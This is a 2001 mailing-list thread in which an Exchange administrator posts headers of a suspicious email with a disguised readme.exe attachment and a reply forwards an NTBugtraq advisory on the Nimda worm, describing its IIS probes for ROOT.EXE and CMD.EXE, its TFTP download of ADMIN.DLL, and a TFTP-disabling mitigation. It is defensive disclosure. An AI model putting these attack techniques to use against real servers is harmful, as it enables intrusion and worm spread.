Sounds like what I just now got notice of from Bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the
network.
A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.
One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2
iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
============================================================================
-----Original Message-----
From: John Matteson [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:32 AM
To: Exchange Discussions
Subject: New Virus / Worm ??
I received an E-mail from a person that I didn't know this morning, and the
subject line was a lot of nonsense characters.
Using Outlook 2000 I highlighted it and it kicked off the attachment, which
opened Media Player and tried to play a file, but got a content error.
Here is the header from the message as it was received. Anyone have any
ideas about this?
===================
Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by
mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version
5.5.2653.13)
id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400
From: [EMAIL PROTECTED]
To:
Subject:
Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407
logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o
dco040cbebsdulogv0412odco0407
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
John Matteson; Exchange Manager
Geac Corporate Infrastructure Systems and Standards
(404) 239 - 2981
...the words that I remember from my childhood still are true, that there
are none so blind as those who will not see....
--The Moody Blues (I know you're out there)
_________________________________________________________________
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin: [EMAIL PROTECTED]
_________________________________________________________________
List posting FAQ: http://www.swinc.com/resource/exch_faq.htm
Archives: http://www.swynk.com/sitesearch/search.asp
To unsubscribe: mailto:[EMAIL PROTECTED]
Exchange List admin: [EMAIL PROTECTED]
